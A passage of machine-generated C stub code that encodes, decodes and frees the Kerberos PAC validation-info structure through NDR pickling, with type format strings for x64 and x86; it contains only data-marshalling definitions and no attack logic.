static const RPC_CLIENT_INTERFACE msKrbPac___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0x3dde7c30, 0x0000, 0x11d1, {0xab, 0x8f, 0x00, 0x80, 0x5f, 0x14, 0xdb, 0x40}}, {1, 0}}, {{0x8A885D04, 0x1CEB, 0x11C9, {0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000};
static const MIDL_TYPE_PICKLING_INFO __MIDL_TypePicklingInfo = {0x33205054, 0x3, 0, 0, 0,};
static RPC_BINDING_HANDLE msKrbPac__MIDL_AutoBindHandle;
static const MIDL_STUB_DESC msKrbPac_StubDesc = {(void *)& msKrbPac___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &msKrbPac__MIDL_AutoBindHandle, 0, 0, 0, 0, ms_pac__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
size_t PKERB_VALIDATION_INFO_AlignSize(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &msKrbPac_StubDesc, (PFORMAT_STRING) &ms_pac__MIDL_TypeFormatString.Format[_ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset], _pType);
}
void PKERB_VALIDATION_INFO_Encode(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &msKrbPac_StubDesc, (PFORMAT_STRING) &ms_pac__MIDL_TypeFormatString.Format[_ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset], _pType);
}
void PKERB_VALIDATION_INFO_Decode(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &msKrbPac_StubDesc, (PFORMAT_STRING) &ms_pac__MIDL_TypeFormatString.Format[_ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset], _pType);
}
void PKERB_VALIDATION_INFO_Free(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &msKrbPac_StubDesc, (PFORMAT_STRING) &ms_pac__MIDL_TypeFormatString.Format[_ms_pac_MIDL_TYPE_FORMAT_STRING_PKERB_VALIDATION_INFO_Offset], _pType);
}
#ifdef _M_X64
static const ms_pac_MIDL_TYPE_FORMAT_STRING ms_pac__MIDL_TypeFormatString = {
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x12, 0x0, /* FC_UP */
/* 4 */ NdrFcShort( 0x1e ), /* Offset= 30 (34) */
/* 6 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 8 */ NdrFcShort( 0x6 ), /* 6 */
/* 10 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 12 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 14 */ NdrFcShort( 0x6 ), /* 6 */
/* 16 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 18 */ NdrFcShort( 0xfff4 ), /* Offset= -12 (6) */
/* 20 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 22 */
0x1b, /* FC_CARRAY */
0x3, /* 3 */
/* 24 */ NdrFcShort( 0x4 ), /* 4 */
/* 26 */ 0x4, /* Corr desc: FC_USMALL */
0x0, /* */
/* 28 */ NdrFcShort( 0xfff9 ), /* -7 */
/* 30 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 32 */ 0x8, /* FC_LONG */
0x5b, /* FC_END */
/* 34 */
0x17, /* FC_CSTRUCT */
0x3, /* 3 */
/* 36 */ NdrFcShort( 0x8 ), /* 8 */
/* 38 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (22) */
/* 40 */ 0x2, /* FC_CHAR */
0x2, /* FC_CHAR */
/* 42 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 44 */ NdrFcShort( 0xffe0 ), /* Offset= -32 (12) */
/* 46 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 48 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 50 */ NdrFcShort( 0x8 ), /* 8 */
/* 52 */ 0x2, /* FC_CHAR */
0x5b, /* FC_END */
/* 54 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 56 */ NdrFcShort( 0x8 ), /* 8 */
/* 58 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 60 */ NdrFcShort( 0xfff4 ), /* Offset= -12 (48) */
/* 62 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 64 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 66 */ NdrFcShort( 0x10 ), /* 16 */
/* 68 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 70 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (54) */
/* 72 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 74 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 76 */ NdrFcShort( 0x10 ), /* 16 */
/* 78 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 80 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (64) */
/* 82 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 84 */
0x1a, /* FC_BOGUS_STRUCT */
0x3, /* 3 */
/* 86 */ NdrFcShort( 0x10 ), /* 16 */
/* 88 */ NdrFcShort( 0x0 ), /* 0 */
/* 90 */ NdrFcShort( 0x6 ), /* Offset= 6 (96) */
/* 92 */ 0x36, /* FC_POINTER */
0x8, /* FC_LONG */
/* 94 */ 0x40, /* FC_STRUCTPAD4 */
0x5b, /* FC_END */
/* 96 */
0x12, 0x0, /* FC_UP */
/* 98 */ NdrFcShort( 0xffc0 ), /* Offset= -64 (34) */
/* 100 */
0x12, 0x0, /* FC_UP */
/* 102 */ NdrFcShort( 0xffee ), /* Offset= -18 (84) */
/* 104 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 106 */ NdrFcShort( 0x8 ), /* 8 */
/* 108 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 110 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 112 */
0x12, 0x0, /* FC_UP */
/* 114 */ NdrFcShort( 0xfff6 ), /* Offset= -10 (104) */
/* 116 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 118 */ NdrFcShort( 0x2 ), /* 2 */
/* 120 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 122 */ NdrFcShort( 0x2 ), /* 2 */
/* 124 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 126 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 128 */ NdrFcShort( 0x0 ), /* 0 */
/* 130 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 132 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 134 */
0x1a, /* FC_BOGUS_STRUCT */
0x3, /* 3 */
/* 136 */ NdrFcShort( 0x10 ), /* 16 */
/* 138 */ NdrFcShort( 0x0 ), /* 0 */
/* 140 */ NdrFcShort( 0x8 ), /* Offset= 8 (148) */
/* 142 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 144 */ 0x40, /* FC_STRUCTPAD4 */
0x36, /* FC_POINTER */
/* 146 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 148 */
0x12, 0x0, /* FC_UP */
/* 150 */ NdrFcShort( 0xffde ), /* Offset= -34 (116) */
/* 152 */
0x1d, /* FC_SMFARRAY */
0x3, /* 3 */
/* 154 */ NdrFcShort( 0x8 ), /* 8 */
/* 156 */ 0x8, /* FC_LONG */
0x5b, /* FC_END */
/* 158 */
0x21, /* FC_BOGUS_ARRAY */
0x3, /* 3 */
/* 160 */ NdrFcShort( 0x0 ), /* 0 */
/* 162 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 164 */ NdrFcShort( 0x9c ), /* 156 */
/* 166 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 168 */ NdrFcLong( 0xffffffff ), /* -1 */
/* 172 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 174 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 176 */ NdrFcShort( 0xffb8 ), /* Offset= -72 (104) */
/* 178 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 180 */
0x21, /* FC_BOGUS_ARRAY */
0x3, /* 3 */
/* 182 */ NdrFcShort( 0x0 ), /* 0 */
/* 184 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 186 */ NdrFcShort( 0x110 ), /* 272 */
/* 188 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 190 */ NdrFcLong( 0xffffffff ), /* -1 */
/* 194 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 196 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 198 */ NdrFcShort( 0xff8e ), /* Offset= -114 (84) */
/* 200 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 202 */
0x21, /* FC_BOGUS_ARRAY */
0x3, /* 3 */
/* 204 */ NdrFcShort( 0x0 ), /* 0 */
/* 206 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 208 */ NdrFcShort( 0x128 ), /* 296 */
/* 210 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 212 */ NdrFcLong( 0xffffffff ), /* -1 */
/* 216 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 218 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 220 */ NdrFcShort( 0xff8c ), /* Offset= -116 (104) */
/* 222 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 224 */
0x1a, /* FC_BOGUS_STRUCT */
0x3, /* 3 */
/* 226 */ NdrFcShort( 0x138 ), /* 312 */
/* 228 */ NdrFcShort( 0x0 ), /* 0 */
/* 230 */ NdrFcShort( 0x60 ), /* Offset= 96 (326) */
/* 232 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 234 */ NdrFcShort( 0xff7e ), /* Offset= -130 (104) */
/* 236 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 238 */ NdrFcShort( 0xff7a ), /* Offset= -134 (104) */
/* 240 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 242 */ NdrFcShort( 0xff76 ), /* Offset= -138 (104) */
/* 244 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 246 */ NdrFcShort( 0xff72 ), /* Offset= -142 (104) */
/* 248 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 250 */ NdrFcShort( 0xff6e ), /* Offset= -146 (104) */
/* 252 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 254 */ NdrFcShort( 0xff6a ), /* Offset= -150 (104) */
/* 256 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 258 */ NdrFcShort( 0xff84 ), /* Offset= -124 (134) */
/* 260 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 262 */ NdrFcShort( 0xff80 ), /* Offset= -128 (134) */
/* 264 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 266 */ NdrFcShort( 0xff7c ), /* Offset= -132 (134) */
/* 268 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 270 */ NdrFcShort( 0xff78 ), /* Offset= -136 (134) */
/* 272 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 274 */ NdrFcShort( 0xff74 ), /* Offset= -140 (134) */
/* 276 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 278 */ NdrFcShort( 0xff70 ), /* Offset= -144 (134) */
/* 280 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 282 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 284 */ 0x8, /* FC_LONG */
0x36, /* FC_POINTER */
/* 286 */ 0x8, /* FC_LONG */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 288 */ 0x0, /* 0 */
NdrFcShort( 0xff29 ), /* Offset= -215 (74) */
0x40, /* FC_STRUCTPAD4 */
/* 292 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 294 */ NdrFcShort( 0xff60 ), /* Offset= -160 (134) */
/* 296 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 298 */ NdrFcShort( 0xff5c ), /* Offset= -164 (134) */
/* 300 */ 0x36, /* FC_POINTER */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 302 */ 0x0, /* 0 */
NdrFcShort( 0xff69 ), /* Offset= -151 (152) */
0x8, /* FC_LONG */
/* 306 */ 0x8, /* FC_LONG */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 308 */ 0x0, /* 0 */
NdrFcShort( 0xff33 ), /* Offset= -205 (104) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 312 */ 0x0, /* 0 */
NdrFcShort( 0xff2f ), /* Offset= -209 (104) */
0x8, /* FC_LONG */
/* 316 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 318 */ 0x40, /* FC_STRUCTPAD4 */
0x36, /* FC_POINTER */
/* 320 */ 0x36, /* FC_POINTER */
0x8, /* FC_LONG */
/* 322 */ 0x40, /* FC_STRUCTPAD4 */
0x36, /* FC_POINTER */
/* 324 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 326 */
0x12, 0x0, /* FC_UP */
/* 328 */ NdrFcShort( 0xff56 ), /* Offset= -170 (158) */
/* 330 */
0x12, 0x0, /* FC_UP */
/* 332 */ NdrFcShort( 0xfed6 ), /* Offset= -298 (34) */
/* 334 */
0x12, 0x0, /* FC_UP */
/* 336 */ NdrFcShort( 0xff64 ), /* Offset= -156 (180) */
/* 338 */
0x12, 0x0, /* FC_UP */
/* 340 */ NdrFcShort( 0xfece ), /* Offset= -306 (34) */
/* 342 */
0x12, 0x0, /* FC_UP */
/* 344 */ NdrFcShort( 0xff72 ), /* Offset= -142 (202) */
/* 346 */
0x12, 0x0, /* FC_UP */
/* 348 */ NdrFcShort( 0xff84 ), /* Offset= -124 (224) */
0x0
}
};
#elif defined _M_IX86
static const ms_pac_MIDL_TYPE_FORMAT_STRING ms_pac__MIDL_TypeFormatString = {
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x12, 0x0, /* FC_UP */
/* 4 */ NdrFcShort( 0x1e ), /* Offset= 30 (34) */
/* 6 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 8 */ NdrFcShort( 0x6 ), /* 6 */
/* 10 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 12 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 14 */ NdrFcShort( 0x6 ), /* 6 */
/* 16 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 18 */ NdrFcShort( 0xfff4 ), /* Offset= -12 (6) */
/* 20 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 22 */
0x1b, /* FC_CARRAY */
0x3, /* 3 */
/* 24 */ NdrFcShort( 0x4 ), /* 4 */
/* 26 */ 0x4, /* Corr desc: FC_USMALL */
0x0, /* */
/* 28 */ NdrFcShort( 0xfff9 ), /* -7 */
/* 30 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 32 */ 0x8, /* FC_LONG */
0x5b, /* FC_END */
/* 34 */
0x17, /* FC_CSTRUCT */
0x3, /* 3 */
/* 36 */ NdrFcShort( 0x8 ), /* 8 */
/* 38 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (22) */
/* 40 */ 0x2, /* FC_CHAR */
0x2, /* FC_CHAR */
/* 42 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 44 */ NdrFcShort( 0xffe0 ), /* Offset= -32 (12) */
/* 46 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 48 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 50 */ NdrFcShort( 0x8 ), /* 8 */
/* 52 */ 0x2, /* FC_CHAR */
0x5b, /* FC_END */
/* 54 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 56 */ NdrFcShort( 0x8 ), /* 8 */
/* 58 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 60 */ NdrFcShort( 0xfff4 ), /* Offset= -12 (48) */
/* 62 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 64 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 66 */ NdrFcShort( 0x10 ), /* 16 */
/* 68 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 70 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (54) */
/* 72 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 74 */
0x15, /* FC_STRUCT */
0x0, /* 0 */
/* 76 */ NdrFcShort( 0x10 ), /* 16 */
/* 78 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 80 */ NdrFcShort( 0xfff0 ), /* Offset= -16 (64) */
/* 82 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 84 */
0x16, /* FC_PSTRUCT */
0x3, /* 3 */
/* 86 */ NdrFcShort( 0x8 ), /* 8 */
/* 88 */
0x4b, /* FC_PP */
0x5c, /* FC_PAD */
/* 90 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 92 */ NdrFcShort( 0x0 ), /* 0 */
/* 94 */ NdrFcShort( 0x0 ), /* 0 */
/* 96 */ 0x12, 0x0, /* FC_UP */
/* 98 */ NdrFcShort( 0xffc0 ), /* Offset= -64 (34) */
/* 100 */
0x5b, /* FC_END */
0x8, /* FC_LONG */
/* 102 */ 0x8, /* FC_LONG */
0x5b, /* FC_END */
/* 104 */
0x12, 0x0, /* FC_UP */
/* 106 */ NdrFcShort( 0xffea ), /* Offset= -22 (84) */
/* 108 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 110 */ NdrFcShort( 0x8 ), /* 8 */
/* 112 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 114 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 116 */
0x12, 0x0, /* FC_UP */
/* 118 */ NdrFcShort( 0xfff6 ), /* Offset= -10 (108) */
/* 120 */
0x1d, /* FC_SMFARRAY */
0x3, /* 3 */
/* 122 */ NdrFcShort( 0x8 ), /* 8 */
/* 124 */ 0x8, /* FC_LONG */
0x5b, /* FC_END */
/* 126 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 128 */ NdrFcShort( 0x2 ), /* 2 */
/* 130 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 132 */ NdrFcShort( 0x32 ), /* 50 */
/* 134 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 136 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 138 */ NdrFcShort( 0x30 ), /* 48 */
/* 140 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 142 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 144 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 146 */ NdrFcShort( 0x2 ), /* 2 */
/* 148 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 150 */ NdrFcShort( 0x3a ), /* 58 */
/* 152 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 154 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 156 */ NdrFcShort( 0x38 ), /* 56 */
/* 158 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 160 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 162 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 164 */ NdrFcShort( 0x2 ), /* 2 */
/* 166 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 168 */ NdrFcShort( 0x42 ), /* 66 */
/* 170 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 172 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 174 */ NdrFcShort( 0x40 ), /* 64 */
/* 176 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 178 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 180 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 182 */ NdrFcShort( 0x2 ), /* 2 */
/* 184 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 186 */ NdrFcShort( 0x4a ), /* 74 */
/* 188 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 190 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 192 */ NdrFcShort( 0x48 ), /* 72 */
/* 194 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 196 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 198 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 200 */ NdrFcShort( 0x2 ), /* 2 */
/* 202 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 204 */ NdrFcShort( 0x52 ), /* 82 */
/* 206 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 208 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 210 */ NdrFcShort( 0x50 ), /* 80 */
/* 212 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 214 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 216 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 218 */ NdrFcShort( 0x2 ), /* 2 */
/* 220 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 222 */ NdrFcShort( 0x5a ), /* 90 */
/* 224 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 226 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 228 */ NdrFcShort( 0x58 ), /* 88 */
/* 230 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 232 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 234 */
0x1b, /* FC_CARRAY */
0x3, /* 3 */
/* 236 */ NdrFcShort( 0x8 ), /* 8 */
/* 238 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 240 */ NdrFcShort( 0x6c ), /* 108 */
/* 242 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 244 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 246 */ NdrFcShort( 0xff76 ), /* Offset= -138 (108) */
/* 248 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 250 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 252 */ NdrFcShort( 0x2 ), /* 2 */
/* 254 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 256 */ NdrFcShort( 0x8a ), /* 138 */
/* 258 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 260 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 262 */ NdrFcShort( 0x88 ), /* 136 */
/* 264 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 266 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 268 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 270 */ NdrFcShort( 0x2 ), /* 2 */
/* 272 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 274 */ NdrFcShort( 0x92 ), /* 146 */
/* 276 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 278 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 280 */ NdrFcShort( 0x90 ), /* 144 */
/* 282 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 284 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 286 */
0x1b, /* FC_CARRAY */
0x3, /* 3 */
/* 288 */ NdrFcShort( 0x8 ), /* 8 */
/* 290 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 292 */ NdrFcShort( 0xc4 ), /* 196 */
/* 294 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 296 */
0x4b, /* FC_PP */
0x5c, /* FC_PAD */
/* 298 */
0x48, /* FC_VARIABLE_REPEAT */
0x49, /* FC_FIXED_OFFSET */
/* 300 */ NdrFcShort( 0x8 ), /* 8 */
/* 302 */ NdrFcShort( 0x0 ), /* 0 */
/* 304 */ NdrFcShort( 0x1 ), /* 1 */
/* 306 */ NdrFcShort( 0x0 ), /* 0 */
/* 308 */ NdrFcShort( 0x0 ), /* 0 */
/* 310 */ 0x12, 0x0, /* FC_UP */
/* 312 */ NdrFcShort( 0xfeea ), /* Offset= -278 (34) */
/* 314 */
0x5b, /* FC_END */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 316 */ 0x0, /* 0 */
NdrFcShort( 0xff17 ), /* Offset= -233 (84) */
0x5b, /* FC_END */
/* 320 */
0x1b, /* FC_CARRAY */
0x3, /* 3 */
/* 322 */ NdrFcShort( 0x8 ), /* 8 */
/* 324 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 326 */ NdrFcShort( 0xd0 ), /* 208 */
/* 328 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 330 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 332 */ NdrFcShort( 0xff20 ), /* Offset= -224 (108) */
/* 334 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 336 */
0x16, /* FC_PSTRUCT */
0x3, /* 3 */
/* 338 */ NdrFcShort( 0xd8 ), /* 216 */
/* 340 */
0x4b, /* FC_PP */
0x5c, /* FC_PAD */
/* 342 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 344 */ NdrFcShort( 0x34 ), /* 52 */
/* 346 */ NdrFcShort( 0x34 ), /* 52 */
/* 348 */ 0x12, 0x0, /* FC_UP */
/* 350 */ NdrFcShort( 0xff20 ), /* Offset= -224 (126) */
/* 352 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 354 */ NdrFcShort( 0x3c ), /* 60 */
/* 356 */ NdrFcShort( 0x3c ), /* 60 */
/* 358 */ 0x12, 0x0, /* FC_UP */
/* 360 */ NdrFcShort( 0xff28 ), /* Offset= -216 (144) */
/* 362 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 364 */ NdrFcShort( 0x44 ), /* 68 */
/* 366 */ NdrFcShort( 0x44 ), /* 68 */
/* 368 */ 0x12, 0x0, /* FC_UP */
/* 370 */ NdrFcShort( 0xff30 ), /* Offset= -208 (162) */
/* 372 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 374 */ NdrFcShort( 0x4c ), /* 76 */
/* 376 */ NdrFcShort( 0x4c ), /* 76 */
/* 378 */ 0x12, 0x0, /* FC_UP */
/* 380 */ NdrFcShort( 0xff38 ), /* Offset= -200 (180) */
/* 382 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 384 */ NdrFcShort( 0x54 ), /* 84 */
/* 386 */ NdrFcShort( 0x54 ), /* 84 */
/* 388 */ 0x12, 0x0, /* FC_UP */
/* 390 */ NdrFcShort( 0xff40 ), /* Offset= -192 (198) */
/* 392 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 394 */ NdrFcShort( 0x5c ), /* 92 */
/* 396 */ NdrFcShort( 0x5c ), /* 92 */
/* 398 */ 0x12, 0x0, /* FC_UP */
/* 400 */ NdrFcShort( 0xff48 ), /* Offset= -184 (216) */
/* 402 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 404 */ NdrFcShort( 0x70 ), /* 112 */
/* 406 */ NdrFcShort( 0x70 ), /* 112 */
/* 408 */ 0x12, 0x0, /* FC_UP */
/* 410 */ NdrFcShort( 0xff50 ), /* Offset= -176 (234) */
/* 412 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
